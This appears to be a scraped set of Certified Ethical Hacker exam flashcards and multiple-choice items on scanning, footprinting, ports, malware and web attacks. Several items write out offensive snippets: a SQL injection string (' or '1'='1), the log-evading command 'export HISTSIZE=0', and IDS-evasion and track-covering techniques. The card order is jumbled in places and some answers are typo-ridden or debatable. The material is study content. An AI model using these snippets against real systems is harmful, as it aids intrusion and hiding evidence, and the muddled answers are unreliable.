You want to display active and inactive services on a Window Server machine. Which of the following commands best performs this service? A. sc query B. sc query type=all C. sc query type=service D. sc query state=all

A)It will allow the internal computer with an address of 10.1.1.12 to use RDP to communicate with all the devices that use IP addresses in the 192.168.2.0 - 192.168.2.255 range.

Your company implements a demilitarized zone (DMZ) to isolate publicly available servers. The security engineer implements the following rule on the firewall that protects and isolates the DMZ: Permit 10.1.1.12 192.168.2.0/24 TCP/UDP Port 3389 What does this rule do? A)It will allow the internal computer with an address of 10.1.1.12 to use RDP to communicate with all the devices that use IP addresses in the 192.168.2.0 - 192.168.2.255 range. B)It will allow the internal computer with an address of 10.1.1.12 to use SNMP to communicate with the device with an address of 192.168.2.0. C)It will allow the internal computer with an address of 10.1.1.12 to use SNMP to communicate with all the devices that use IP addresses in the 192.168.2.0 - 192.168.2.255 range. D)It will allow the internal computer with an address of 10.1.1.12 to use RDP to communicate with the device with an address of 192.168.2.0.

B)Identify if computer files have been changed

Your company regularly uses MD5 hashing on their file server. What is the purpose? A)Capture all communication with the file server B)Identify if computer files have been changed C)Detect any intrusions on the file server D)Prevent any intrusions on the file server

802.11n

can run upward of 150 Mbps

OpManager

is a network monitoring software that offers advanced fault and performance management functionality across critical IT resources such as routers, WAN links, switches, firewalls, VoIP call paths, physical servers, etc.

Simple Service Discovery Protocol (SSDP)

is a network protocol that works in conjunction with UPnP to detect plug and play devices available in a network

Spam Mimic

is a spam/email steganography tool that encodes the secret message into an innocent looking spam emails

Shoulder Surfing

is a technique, where attackers secretly observes the target to gain critical information

FOCA (Fingerprinting Organizations with Collected Archives)

is a tool used mainly to find metadata and hidden information in the documents its scans

Social engineering

is an art of exploiting human behaviour to extract configential information

XMAS

is so named because all flags are turned on.

ethical hacker

is someone who employs the same tools and techniques a criminal might use, with the customer's full support and approval, to help secure a network or system.

phreaker

is someone who manipulates telecommunication systems in order to make free calls.

PsList

list detailed information about processes

basically just run a reverse DNS lookup on all IPs in the subnet.

list scan

cyberterrorist

motivated by religious or political beliefs to create fear and large scale systems disruption

Web spiders

perform automated searches on the target website and collect specified information such as employee names, email addresses, etc.

Angry IP Scanner

pings each IP address to check if it's alive, then optionally resolves its hostname, determines the MAC address, scans ports, etc

Registered ports

port numbers 1024 - 49,151

/etc/passwd

where can the UID (User ID) and GID (Group ID) be found on a Linux machine?

Scanning Methodology

Check for Live Systems Check for Open Ports Scanning Beyond IDS Banner Grabbing Scan for Vulnerability Draw Network Diagrams Prepare Proxies Scanning Pen Testing

provide compatibility

Windows Application Compatibility Framework, shim is used to ___ between the older and newer versions of Windows operating system

B)Receive incoming syslog messages

Recently, you decided to open UDP port 514 on your company's firewall. What is the purpose of this action? A)Receive network time protocol messages B)Receive incoming syslog messages C)Allow users to access computers using rlogin D)Receive SNMP packets

TCP/UDP 162

SNMP Trap

Telnet request to port 25

What would the below output represent? 220 mailserver.domain.com Microsoft ESMTP MAIL Service, Version: 5.0.2195.5329 ready at Sat, 29 Jan 2011 11:29:14 +0200

D) Sigverif

Which built in Windows tool can be used to check the integrity of digitally signed critical files from Microsoft? A) Sc B) Netstat C) Msconfig D) Sigverif

D. Single Quote

Which character is the best choice to start a SQL injection attempt? A. Colon B. Semicolon C. Double Quote D. Single Quote

C)Preventative

Which class of control is smart card authentication? A)Prescriptive B)Corrective C)Preventative D)Detective

SSL

Which common web transport protocol can be used to evade an IDS and tunnel malicious content?

D)Switches

Which device is susceptible to MAC flood attacks? A)Hubs B)Routers C)Firewalls D)Switches

B)GLBA

Which of the following addresses the collection and disclosure of customers' personal financial information by financial institutions? A)HIPAA B)GLBA C)SOX D)FISMA

C) PKI

Which of the following are NOT components of a Kerberos system? A) KDC B) AD C) PKI D) TGS E) TGT

Meltdown Vulnerability

-Attackers may take advantage of this vulnerability to escalate privileges by forcing an unprivileged process to read other adjacent memory locations such as kernel memory and physical memory -This leads to revealing of critical system information such as credentials, private keys, etc.

Spectre Vulnerability

-Attackers may take advantage of this vulnerability to read adjacent memory locations of a process and access information for which he/she is not authorized -Using this vulnerability an attacker can even read the kernel memory or perform a web based attack using JavaScript

LOCAL_SYSEM

Which Windows security context is a hacker operating from if the hacker can spawn a shell after a successful buffer overflow attack?

A)Iris

Which biometric scan focuses on the colored portion of the user's eye? A)Iris B)Retina C)Facial recognition D)Corneal

promiscuous mode

A configuration of a network card that makes the card pass all traffic it receives to the central processing unit rather than just frames addressed to it -- a feature normally used for packet sniffing and bridged networking for hardware virtualization. Windows machines use WinPcap for this ; Linux uses libpcap.

ICMP Type 4

A congestion control message.

C) 128

A Windows Server 2000 machine uses Syskey as an additional security step in regard to password protection. How many bits does Syskey use for encryption? A) 40 B) 64 C) 128 D) 256

promiscuous

A ___ policy is basically wide open.

Paranoid

A ___ policy locks everything down, not even allowing the user to open so much as an Internet browser.

Prudent

A ___ policy, which provides maximum security but allows some potentially and known dangerous services because of business needs.

Authentication header (AH)

An Internet Protocol Security (IPSec) header to verify that the contents of a packet have not been modified while the packet was in transit.

brute-force password attack

A method of password cracking whereby all possible options are systematically enumerated until a match is found. These attacks try every password (or authentication option), one after another, until successful.

Intranet Zone

A controlled zone that has little-to-no heavy restrictions.

B)set type=mx

A hacker is using nslookup in interactive mode to query Domain Name Service (DNS). The hacker specifically wants to discover the mail server records for your network. What should the hacker type into the command shell to request the appropriate records? A)locate type=ns B)set type=mx C)locate type=mx D)set type=ns

D)Hacktivist

A hacker was recently caught trying to deface the web site of a company with which he had serious disagreement concerning their use of certain chemicals in their products. What is this type of hacker called? A)Ethical hacker B)White hat C)Cracker D)Hacktivist

Biometrics

A measurable, physical characteristic used to recognize the identity, or verify the claimed identity, of an applicant.

Production Network Zone (PNZ)

A very restricted zone that strictly controls direct access from uncontrolled zones.

TCP

An SYN attack uses which protocol?

Challenge Handshake Authentication Protocol (CHAP)

An authentication method on point-to-point links, using a three-way handshake and a mutually agreed-upon key.

certificate

An electronic file used to verify a user's identity, providing nonrepudiation throughout the system. It is also a set of data that uniquely identifies an entity. Contain the entity's public key, serial number, version, subject, algorithm type, issuer, valid dates, and key usage details.

Burp Suite Firebug Website Informer

Analyzing a website from afar can show information such as software in use, OS, filenames, paths, and contact details, what tools can you use to gather this information?

B)getElementsByTagName() C)getElementById()

Another member of your security team is confused about cross-site scripting (XSS) attacks. You explain how phishing attempts can use XSS to replace existing content on the webpage. She decides to write a simple JavaScript XSS defacement function. Which document object method(s) should you suggest she use? (Choose all that apply.) A)adoptNode() B)getElementsByTagName() C)getElementById() D)importNode() E)open() F)renameNode() G)write()

B)IDS

As an ethical hacker, you are using Nmap port scanning and must try to evade a certain type of device. You are using the following techniques: Break the network scans up into smaller ranges, with delays in between each scan. Break up IP packets into fragments. Which type of device are you most likely attempting to evade? A)Firewall B)IDS C)Router D)NAC

document all the findings

At the end of pen testing ______.

permission

Ethical hackers performs security assessment of their organization with the _____ of concerned authorities

-U

Hping sets the URG flag

hides the messages in ASCII text

In white space steganography, user ___ by adding white spaces to the end of the lines

Proxy Switcher

What tool hides your IP address from the websites you visit?

TCPTROJAN

Which of the following is not a trojan? A) BO2K B) LOKI C) Subseven D) TCPTROJAN

ALE

___ is the product of the annual rate of occurrence (ARO) and the single loss expectancy (SLE).

network activity

Necurs monitors and filters ___ and has been observed to send spam and install rogue security software

<1D> GROUP

NetBIOS code and type for Master browser for the subnet.

<20> UNIQUE

NetBIOS code and type for Server service running

<03> UNIQUE

NetBIOS code and type for Service running on the system.

HTTPS (TCP)

Port number 443

SMB (TCP)

Port number 445

Syslog

Port number 514

DNS (TCP, UDP)

Port number 53

Internet Printing Protocol

Port number 631

DHCP (UDP)

Port number 67

"export HISTSIZE=0"

Attackers can use ___ command to delete the command history and the specific command they used to hide log files

bypass firewall rules logging mechanism

Attackers use stealth scanning techniques to ___ and hide themselves as usual network traffic

social engineering

Attackers use this metadata and hidden information in order to perfork ___ and other attacks

ICMP echo and ICMP reply

Attackers uses ICMP tunneling technique to use ____ packets as a carrier of TCP payload, to access or control a system stealthily

live hosts on the network services type of packet filters/firewalls operating systems OS versions

Attackers uses Nmap to extract information such as __ (application name and version), __, __

privileged user accounts

Attackers using these exploits can access ___ and credentials

application-level attacks

Attacks on the actual programming code of an application.

Shrink-wrap code attacks

Attacks that take advantage of the built-in code and scripts most off-the-shelf applications come with.

something you know (user ID and password) something you have (smart card or token) something you are (biometrics)

Authentication measures are categorized by ___, ___, ___.

This flag signifies an ordered close to communications.

FIN (Finish)

Port is open (Xmas scan)

FIN + URG + PUSH --> <-- No Response

Port is closed (Xmas scan)

FIN + URG + PUSH --> <-- RST

TCP Session Termination

FIN --> <-- ACK <-- FIN ACK -->

RFC 793-based

FIN scan works only with OSes with __ TCP/IP implementation

Layer 7 Application

FTP, HTTP, SMTP, Etc resides at what layer of the OSI model?

appending a dot (.)

Files in UNIX can be hidden just by ___ in front of a file name

- Search for the target company's external URL in a search engine - Sub-domains provide an insight into different departments and business units in an organization - You may find a company's sub domains by trial and error method or using a service such as netcraft - You can use Sublist3r python script that enumerates subdomains across multiple sources at once

Finding Company's Top-level Domains (TLDs) and Sub-domains

Know Security Posture

Footprinting allows attackers to know the external security posture of the target organization

as the process of gathering information on computer systems and networks.

Footprinting is defined as:

first step, publicly available sensitive information

Footprinting is the ____ of any attack on information systems; attackers gathers _____ , using which he/she performs social engineering, system and network attacks, etc. that leads to huge financial loss of business reputation

- Prevent DNS record retrieval from publically available servers - Prevent information leakage - Prevent social engineering attemps

Footprinting pen testing helps organization to:

D. EAL (Evaluation Assurance Level)

Four terms make up the Common Criteria process. Which of the following contains seven levels used to rate the target? A. ToE B. ST C. PP D. EAL

Using Reverse HTTP Shells Using Reverse ICMP Tunnels Using DNS Tunneling Using TCP Parameters

Four ways to Covering Tracks on Network

competitive intelligence

Freely and readily available information on an organization that can be gathered by a business entity about its competitor's customers, products, and marketing. It can be used by an attacker to build useful information for further attacks.

C. 217.88.53.154

From the partial e-mail header provided, which of the following represents the true originator of the e-mail message? Return-path: <[email protected]> Delivery-date: Wed, 13 Apr 2011 00:31:13 +0200 Received: from mailexchanger.anotherbiz.com([220.15.10.254]) by mailserver.anotherbiz.com running ExIM with esmtp id xxxxxx-xxxxxx-xxx; Wed, 13 Apr 2011 01:39:23 +0200 Received: from mailserver.anybiz.com ([158.190.50.254] helo=mailserver.anybiz.com) by mailexchanger.anotherbiz.com with esmtp id xxxxxx-xxxxxx-xx for [email protected]; Wed, 13 Apr 2011 01:39:23 +0200 Receved: from SOMEONEComputer [217.88.53.154] (helo=[SOMEONEcomputer]) by mailserver.anybiz.com with esmtpa (Exim x.xx) (envelope-from <[email protected]) id xxxxx-xxxxxx-xxxx for [email protected]; Tue, 12 Apr 2011 20:36:08 -0100 Message-ID: <[email protected]> Date: Tue, 12 Apr 2011 20:36:01 -0100 X-Mailer: Mail Client From: SOMEONE Name<[email protected]> To: USERJOE Name<[email protected]> Subject: Something to consider ... A. 220.15.10.254 B. 158.190.50.254 C. 217.88.53.154 D. The e-mail header does not show this information

B) The CAM table of the switch will overflow, causing the switch to broadcast all packets received

Frustrated by the inability to sniff traffic on a switch, an attacker sends thousands of ARP messages through the switch. What is trying to accomplish? A) The MAC address pairings on the computer will become confused B) The CAM table of the switch will overflow, causing the switch to broadcast all packets received C) The CAM table will set up false MAC address to port matches, resulting in mis-delivery of packets D) The CAM table will overflow, forcing the switch to reboot

www.alexa.com

company's online reputation (as well as the company's efforts to control it) and the actual traffic statistics of the company's web traffic can be found where?

Teardrop

custom fragmented packets

Sarbanes-Oxley (SOX)

was created to make corporate disclosures more accurate and reliable in order to protect the public and investors from shady behavior.

execute malicious programs

Attackers can use this technique to ___ at system startup, maintain persistence, perform remote execution, escalate privileges, etc.

network topology trusted routers firewall locations

Attackers conduct traceroute to extract information about: _______

inject malicious script

Attackers create web shells to ___ on a web server to maintain persistent access and escalate privileges

Shrink Wrap Code Attacks

Attackers exploit default configuration and settings of the off-the-shelf libraries and code

steal critical system information such as credentials, secret keys

Attackers exploit these vulnerabilities to gain unauthorized access and ___, etc. stored in the application's memory to escalate privileges

SecurityFocus Exploit Database

Attackers search for an exploit based on the OS and software application on exploit sites such as ___, ___

gain access to a system

Attackers search for vulnerabilities in an operating system's design, installation or configuration and exploit them to ______

TCP probe packets with ACK flag

Attackers send ___ set to a remote device and then analyzes the header information (TTL and WINDOW field) of received RST packets to find whether the port is open or closed

TCP probe packets

Attackers send ___ with a TCP flag (FIN, URG, PSH) set or with no flags, no response means port is open and RST means the port is closed

Netcat (Banner Grabbing)

This utility reads and writes data across network connections, using the TCP/IP protocol

Launchd

___ is used in MacOS and OS X boot up to complete the system initialization process by loading parameters for each launch-on-demand system-level daemon

D) Hactivism

_____ occurs when a hacker performs attacks because of political motivation A) Black hat hacking B) Gray box attacks C) Black box attacks D) Hactivism

Banner Grabbing

_____ or OS fingerprinting is the method to determine the operating system running on a remote target system.

port is filtered port is not filtered

Attackers send an ACK probe packet with random sequence number, no response means ___ (stateful firewall is present) and RST response means the ___

inventory of live systems

Attackers then use ping sweep to create an ____ in the subnet

Port Scanning Countermeasures

1) Configure firewall and IDS to detect and block probes 2) Run the port scanning tools against hosts on the network to determine whether the firewall properly detects the port scanning activity 3) Ensure that mechanism used for routing and filtering at the routers and firewalls respectively cannot be bypasses using particular source ports or source-routing methods 4) Ensure that the router, IDS, and firewall firmware are updated to their latest releases 5) Use custom rule set to lock down the network and block unwanted ports at the firewall 6) Filter all ICMP messages (i.e. inbound ICMP message types and outbound ICMP type 3 unreachable messages) at the firewalls and routers 7) Perform TCP and UDP scanning along with ICMP probes against your organization's IP address space to check the network configuration and its available ports 8) Ensure that the anti scanning and anti spoofing rules are configured

Banner Grabbing Countermeasures: Disabling or Changing Banner

1) Display false banners to misguide attackers 2) Turn off unnecessary services on the network host to limit the information disclosure 3) Use ServerMask (http://www.port80software.com) tools to disable or change banner information 4) Apache 2.x with mod_headers module - use a directive in httpd.conf file to change banner information Header set Server "New Server Name" 5) Alternatively, change the ServerSignature line to ServerSignature Off in httpd.conf file

Banner Grabbing Countermeasures: Hiding File Extensions from Web Pages

1) File extensions reveal information about the underlying server technology that an attacker can utilize to launch attacks 2) Hide file extensions to mask the web technology 3) Change application mappings such as .asp with .htm or .foo, etc. to disguise the identity of the servers 4) Apache users can use mod_negotiation directives 5) IIS users use tools such as PageXchanger to manage the file extensions

IP Identification Number

1) Send probe to host of suspect spoofed traffic that triggers reply and compare IP ID with suspect traffic 2) If IP IDs are not in the near value of packet being checked, suspect traffic is spoofed 3) This technique is successful even if the attacker is in the same subnet

IDS Evasion Techniques

1) Use fragmented IP packets 2) Spoof your IP address when launching attacks and sniff responses from server 3) Use source routing (if possible) 4) Connect to proxy servers or compromised trojaned machines to launch attacks

Proxy Chaining

1) User requests a resource from the destination 2) Proxy client at the user's system connects to a proxy server and passes the request to proxy server 3) The proxy server strips the user's identification information and passes the request to next proxy server 4) This process is repeated by all the proxy servers in the chain 5) At the end unencrypted request is passed to the web server

Access control list (ACL)

A method of defining what rights and permissions an entity has to a given resource.

penetration testing

A method of evaluating the security of a computer system or network by simulating an attack from a malicious source.

daisy chaining

A method of external testing whereby several systems or resources are used together to make an attack.

CNAME record

A Canonical Name record within DNS, used to provide an alias for a domain name.

A. Scanning

A Certified Ethical Hacker (CEH) follows a specific methodology for testing a system. Which step comes after footprinting in the CEH methodology? A. Scanning B. Enumeration C. Reconnaissance D. Application attack

acknowledgment (ACK)

A TCP flag notifying an originating station that the preceding packet (or packets) has been received

Permissive

A ___ policy blocks only things that are known to be naughty or dangerous.

reverse DNS resolution

A ____ is carried out to identify the host names doing a List Scan

daemon

A background process found in Unix, Linux, Solaris, and other Unix-based operating systems.

cold site

A backup facility with the electrical and physical components of a computer facility, but with no computer equipment in place. The site is ready to receive the necessary replacement computer equipment in the event the user has to move from his main computing location to an alternate site.

cloning

A cell phone attack in which the serial number from one cell phone is copied to another in an effort to copy the cell phone.

A) Anomaly based

A client asks you about intrusion detection systems. They want a system that dynamically learns traffic patterns and alerts on abnormal traffic. Which IDS would you recommend? A) Anomaly based B) Pattern based C) Signature based D) None of the above

D. Configure server side input validation on all web forms

A client is concerned about web server security. In addition to taking steps against buffer overflows on several web applications, the clients wants to mitigate against cross site scripting from the web front ends. Which of the following would be the best choice to assist in this? A. Perform a vulnerability scan using NESSUS B. Perform a penetration test like scan against the server using Metasploit C. Ensure only the Apache web server is in use D. Configure server side input validation on all web forms

A. Buffer Overflow

A client's web application appears to have an excessive number of GETS. Which attack is this software potentially susceptible to? A. Buffer Overflow B. Brute Force C. SQL Injection D. Parameter Tampering

community cloud

A cloud model where the infrastructure is shared by several organizations, usually with the same policy and compliance considerations.

ad hoc mode

A mode of operation in a wireless LAN in which clients send data directly to one another without utilizing a wireless access point (WAP), much like a point-to-point wired connection.

B. An ACK scan using hping3 on port 80 for a group of addresses

A colleague enters the following command: root@mybox: # hping3 -A 192.168.2.x -p 80 What is being attempted here? A. An ACK scan using hping3 on port 80 for a single address B. An ACK scan using hping3 on port 80 for a group of addresses C. Address validation using hping3 on port 80 for a single address D. Address validation using hping3 on port 80 for a group of addresses

D. The search engine will respond with only those pages having the word intranet in the title and URL and with human resources in the text.

A colleague enters the following into a Google search string: intitle:intranet inurl:intranet:+intext:"human resources" Which of the following is most correct concerning this attempt? A. The search engine will not respond with any result because you cannot combine Google hacks in one line. B. The search engine will respond with all pages having the word intranet in their title and human resources in the URL. C. The search engine will respond with all pages having the word intranet in the title and in the URL. D. The search engine will respond with only those pages having the word intranet in the title and URL and with human resources in the text.

archive

A collection of historical records or the place where they are kept. In computing, an ___ generally refers to backup copies of logs and/or data.

Telnet for banner grabbing

A common method of performing banner grabbing is to use a simple tool already built into most operating systems, ____.

B. Ensuring there are no A records for internal hosts on the public-facing name server

A company has a publicly facing web application. Its internal intranet-facing servers are separated and protected by a firewall. Which of the following choices would be helpful in protecting against unwanted enumeration? A. Allowing zone transfers to ANY B. Ensuring there are no A records for internal hosts on the public-facing name server C. Changing the preference number on all MX records to zero D. Not allowing any DNS query to the public-facing name server

C)DNS zone transfer enumeration

A company hosts a public web application and an internal Intranet protected by a firewall. All DNS queries go through a single DNS server. Due to security concerns, your company deployed a second internal DNS server. You remove all the internal A resource records from the old DNS server and configure it to only communicate with external entities using an external DNS zone. The new internal DNS server contains only the internal zone with internal resource records. What should this countermeasure protect against? A)DNS hijacking B)DNS cache poisoning C)DNS zone transfer enumeration D)DoS attacks

crossover error rate (CER)

A comparison metric for different biometric devices and technologies; the point at which the false acceptance rate (FAR) equals the false rejection rate (FRR). As an identification device becomes more sensitive or accurate, its FAR decreases while its FRR increases. Is the point at which these two rates are equal, or cross over.

buffer overflow

A condition that occurs when more data is written to a buffer that it has space to store, which results in data corruption or other system errors. This is usually because of insufficient bounds checking, a bug, or improper configuration in the program code.

A)Social engineering

A customer receives an unsolicited call from a known software company. The person on the other end requires the customer to verify their user credentials over the phone. Which term describes this type of hacking? A)Social engineering B)Tailgating C)Soft skills D)Gumshoeing

cracker

A cyberattacker who acts without permission from, and gives no prior notice to, the resource owner. This is also known as a malicious hacker.

D)Maps out the tables within the database is trying to exploit

A database administrator contacts you regarding the database he administers. He is concerned that an attacker is using database fingerprinting. What does this do? A)Attempts to run SQL statements B)Causes the SQL database to shut down C)Provides information about the server on which the database resides D)Maps out the tables within the database is trying to exploit

Script kiddie

A derogatory term used to describe an attacker, usually new to the field, who uses simple, easy-to-follow scripts or programs developed by others to attack computer systems and networks and deface websites.

Anonymizer

A device or service designed to obfuscate traffic between a client and the Internet. It is generally used to make activity on the Internet as untraceable as possible.

Suicide hacker

A hacker who aims to bring down critical infrastructure for a "cause" and does not worry about the penalties associated with his actions.

Backdoor

A hidden capability in a system or program for bypassing normal computer authentication systems.

Time and date Actions Events

A logic bomb is activated by which of the following? A) Time and date B) Vulnerability C) Actions D) Events

B. An external threat can take advantage of the misconfigured X-server vulnerability. D. An internal threat can take advantage of the misconfigured X-server vulnerability

A machine in your environment uses an open X-server to allow remote access. The X-server access control is disabled, allowing connections from almost anywhere and with little to no authentication measures. Which of the following are true statements regarding this situation? (Choose all that apply.) A. An external vulnerability can take advantage of the misconfigured X-server threat. B. An external threat can take advantage of the misconfigured X-server vulnerability. C. An internal vulnerability can take advantage of the misconfigured X-server threat. D. An internal threat can take advantage of the misconfigured X-server vulnerability

unsolicited SYN/ACK

A machine that receives an ___ packet will respond with an RST. An unsolicited RST will be ignored

Mandatory access control (MAC)

A means of restricting access to system resources based on the sensitivity (as represented by a label) of the information contained in the system resource and the formal authorization (that is, clearance) of users to access information of such sensitivity.

Annualized loss expectancy (ALE)

A measurement of the cost of an asset's value to the organization and the monetary loss that can be expected for an asset due to risk over a one-year period.

B. False negatives

A network and security administrator installs an NIDS. After a few weeks, a successful intrusion into the network occurs and a check of the NIDS during the timeframe of the attack shows no alerts. An investigation shows the NIDS was not configured correctly and therefore did not trigger on what should have been attack alert signatures. Which of the following best describes the actions of the NIDS? A. False positives B. False negatives C. True positives D. True negatives

D) Python

A new network administrator is asked to schedule daily scans of systems throughout the enterprise. Which of the following programming languages has an OSI-approved open source license and is commonly used for accomplishing this goal? A) ASP.NET B) PHP C) C# D) Python

B) The team is practicing passive footprinting D) The team is gathering competitive intelligence

A pen test team starts a particular effort by visiting the company's website, a team member goes to social networking sites and job boards looking for information and building a profile on the organization. Which of the following statements are true regarding these efforts? (Choose two) A) The team is practicing active footprinting B) The team is practicing passive footprinting C) The team is gathering sensitive information that should be protected D) The team is gathering competitive intelligence

D) Running the command sid2user S-1-5-21-861567501-1383384898-839522115-500 will return the name of the true administrator account

A penetration test team member is running user2sid commands on a machine. After entering the command: User2sid \\218.55.62.3 guest, She receives an output of: S-1-5-21-861567501-1383384898-839522115-501 Which of the following is true regarding this output? A) Running the command sid2user S-1-5-21-861567501-1383384898-839522115-501 will return the name of the true administrator account B) Running the command sid2user S-1-5-21-861567500-1383384898-839522115-501 will return the name of the true administrator account C) Running the command sid2user S-1-5-21-861567501-1383384898-500-501 will return the name of the true administrator account D) Running the command sid2user S-1-5-21-861567501-1383384898-839522115-500 will return the name of the true administrator account

A. The background web application used the first record it could find in the table

A penetration tester finds a web application offering an error message with an entry area for an e-mail account. The penetration test enters ' or '1'='1 into the field and presses <ENTER>. A message appears stating "Your login information has been mailed to [email protected]. What is the likely reason for this? A. The background web application used the first record it could find in the table B. The background web application used a random record from the table C. The background web application has crashed D. The background web application is now stuck in a loop

D) Cain

A penetration tester has gained access to a .pcf file. Which of the following tools could be useful in decoding passwords embedded in the file? A) Nessus B) Nmap C) John the Ripper D) Cain

A. Create a route statement within the meterpreter

A penetration tester is using Metasploit to attack an FTP server. He wants to attack to use the FTP server as a launching point to "pivot" to an internal LAN segment. Which of the following should be accomplished to perform the attack? A. Create a route statement within the meterpreter B. Set payload action in the meterpreter to propogate C. Choose the pivot exploit D. Set network configuration parameters to reconfigure in the meterpreter

A)Data-mining techniques

A programmer from your company contacts you regarding a possible security breach. During the discussion, he asks you to identify and investigate unauthorized transactions. What should you use to provide him with this information? A)Data-mining techniques B)Reconnaissance C)Footprinting D)Banner grabbing

Bluetooth

A proprietary, open, wireless technology used for transferring data from fixed and mobile devices over short distances.

Address Resolution Protocol (ARP)

A protocol used to map a known IP address to a physical (MAC) address. It is defined in RFC 826.

URL imbedding

A public use workstation contains the browsing history of multiple users who logged in during the last seven days. WHile digging through the history, a user runs across the following web address: www.snaz33enu.com/&w25/session-22525

Audit trail

A record showing which user has accessed a given resource and what operations the user performed during a given period.

tailgaiting

A security cameras picks up someone who doesn't work at the company following closely behind ab employee while they enter the building. What type of attack is taking place?

It will scan all of the hosts on the 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0 and 192.168.5.0 subnets.

A security engineer runs the following Nmap command: nmap -sn -PE 192.168.1-5 What are the results of this scan? A)It will scan the first five hosts on the 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0 and 192.168.5.0 subnets. B)It will scan all hosts on the 192.168.1.0 subnet. C)It will scan the first host on the 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0 and 192.168.5.0 subnets. D)It will scan all of the hosts on the 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0 and 192.168.5.0 subnets.

confidentiality

A security objective that ensures a resource can be accessed only by authorized users. This is also the security principle that stipulates sensitive information is not disclosed to unauthorized individuals, entities, or processes.

A. The attacker took advantage of a zero-day vulnerability on the machine.

A security peer is confused about a recent incident. An attacker successfully accessed a machine in the organization and made off with some sensitive data. A full vulnerability scan was run immediately following the theft, and nothing was discovered. Which of the following best describes what may have happened? A. The attacker took advantage of a zero-day vulnerability on the machine. B. The attacker performed a full rebuild of the machine after he was done. C. The attacker performed a denial-of-service attack. D. Security measures on the device were completely disabled before the attack began.

C. Ensure that any remaining risk is residual or low and accept the risk.

A security team is implementing various security controls across the organization. After several configurations and applications, a final agreed-on set of security controls are put into place; however, not all risks are mitigated by the controls. Of the following, which is the next best step? A. Continue applying controls until all risk is eliminated. B. Ignore any remaining risk as "best effort controlled." C. Ensure that any remaining risk is residual or low and accept the risk. D. Remove all controls.

500

A simple scanning for ISAKMP at UDP port ___ can indicate the presence of a VPN gateway

computer-based attack

A social engineering attack using computer resources such as e-mail and IRC

bug

A software or hardware defect that often results in system vulnerabilities.

Algorithm

A step-by-step method of solving a problem.

cache

A storage buffer that transparently stores data so future requests for the same data can be served faster.

community string

A string used for authentication in SNMP

block cipher

A symmetric key cryptographic algorithm that transforms a block of information at a time using a cryptographic key.

Blowfish

A symmetric, block-cipher data-encryption standard that uses a variable-length key that can range from 32 bits to 448 bits.

C)Location anonymity

A systems administrator reports to you that an attacker used a TOR proxy to carry out an attack against your network. What does this proxy provide to the attacker? A)Payload obscurity B)Packet fragmentation C)Location anonymity D)Overlapping fragments

B. The attacker will see message 2.

A target machine (with a MAC of 12:34:56:AB:CD:EF) is connected to a switch port. An attacker (with a MAC of 78:91:00:ED:BC:A1) is attached to a separate port on the same switch with a packet capture running. There is no spanning of ports or port security in place. Two packets leave the target machine. Message 1 has a destination MAC of E1:22:BA:87:AC:12. Message 2 has a destination MAC of FF:FF:FF:FF:FF:FF. Which of the following statements is true regarding the messages being sent? A. The attacker will see message 1. B. The attacker will see message 2. C. The attacker will see both messages. D. The attacker will see neither messages.

A. --script D. -sC

A team member is using nmap and asks about the "scripting engine" in the tool. Which option switches can be used to invoke the nmap scripting engine? (Choose two.) A. --script B. -z C. -sA D. -sC

B. It displays the NetBIOS name cache.

A team member issues the nbtstat.exe -c command. Which of the following best represents the intent of the command? A. It displays the IP route table for the machine. B. It displays the NetBIOS name cache. C. It displays active and inactive services. D. It puts a NIC into promiscuous mode for sniffing.

A)String formatting C)Buffer overflow E)Code injection F)Thread racing

A team of developers is creating mobile apps that target Apple iOS devices. Which of the following vulnerabilities should they address when using Objective-C? (Choose all that apply.) A)String formatting B)Memory corruption C)Buffer overflow D)Log injection E)Code injection F)Thread racing G)Access control H)Type confusion

cookie

A text file stored within a browser by a web server that maintains information about the connection. Are used to store information to maintain a unique but consistent surfing experience but can also contain authentication parameters. Can be encrypted and have defined expiration dates.

B. User input is not sanitized, which can potentially be exploited

A user forgets her password to a website, and the web application asks her to enter her email to have the password emailed to her. She enters her email as a [email protected]. The application displays a server error. What is most likely wrong with the web application? A. Nothing. The email is not valid and this is normal respons B. User input is not sanitized, which can potentially be exploited C. The web server installation has poor privilege control D. The application uses a back end database

D) 5 minutes

A user has chosen a 22 character password is that straight out of a dictionary. Approximately how long will it take to crack the password? A) 50 years B) 22 years C) 15 days D) 5 minutes

D. Cross site scripting

A user receives an e-mail with a link to an interesting forum. She clicks the link and is taken to a web based bulletin board; however, additional functions are carried out in the background under her user privileges. The functions allow the attacker access to information used on the BBS, even though no executables are downloaded and run on the user's machine. Which of the following best describes this attack? A. Backdoor B. Trapdoor C. Denial of Service D. Cross site scripting

cryptographic key

A value used to control cryptographic operations, such as decryption, encryption, signature generation, and signature verification.

D) Display pop-ups

A virus does not do which of the following? A) Replicate with user interaction B) Change configuration settings C) Exploit vulnerabilities D) Display pop-ups

boot sector virus

A virus that plants itself in a system's boot sector and infects the master boot record.

B. The password is never sent in clear text over the network

A web administrator chooses Digest authentication over Basic authentication on her website Why is Digest authentication considered more secure than Basic authentication? A. Basic authentication uses single factor B. The password is never sent in clear text over the network C. The password is sent in clear text over the network but is never reused D. It uses Kerberos

B. The firewall doesn't protect against port 80 or port 443

A web server sits behind a firewall and offers HTTP and HTTPS access to a website and web applications. External users access the server for various web applications. Which of the following is true regarding the protection offered by the firewall? A. The firewall can detect malicious traffic will halt attacks B. The firewall doesn't protect against port 80 or port 443 C. If properly configured, a firewall is the only protection needed to safeguard the server D. Authentication methods configured at the firewall can halt most attacks

Access point (AP)

A wireless LAN device that acts as a central point for all wireless traffic.

802.11i

A wireless LAN security standard developed by IEEE. Requires Temporal Key Integrity Protocol (TKIP) and Advanced Encryption Standard (AES)

A. PTR B. MX D. SOA F. A

A zone file consists of which records? (Choose all that apply.) A. PTR B. MX C. SN D. SOA E. DNS F. A G. AX

-TTL based ACK flag probe scanning or -WINDOW based ACK flag probe scanning

ACK Probe Packets --> <-- RST

Layer 6 Presentation

AFP, NCP, MIME, Etc resides at what layer of the OSI model?

Asia and the Pacific

APNIC manages what areas?

Canada, many Caribbean and North Atlantic islands, and the United States.

ARIN manages what areas?

Layer 2 Data Link

ARP, CDP, PPP, Etc. resides at what layer of the OSI model?

D)Create and enforce a physical security policy for remote employees.

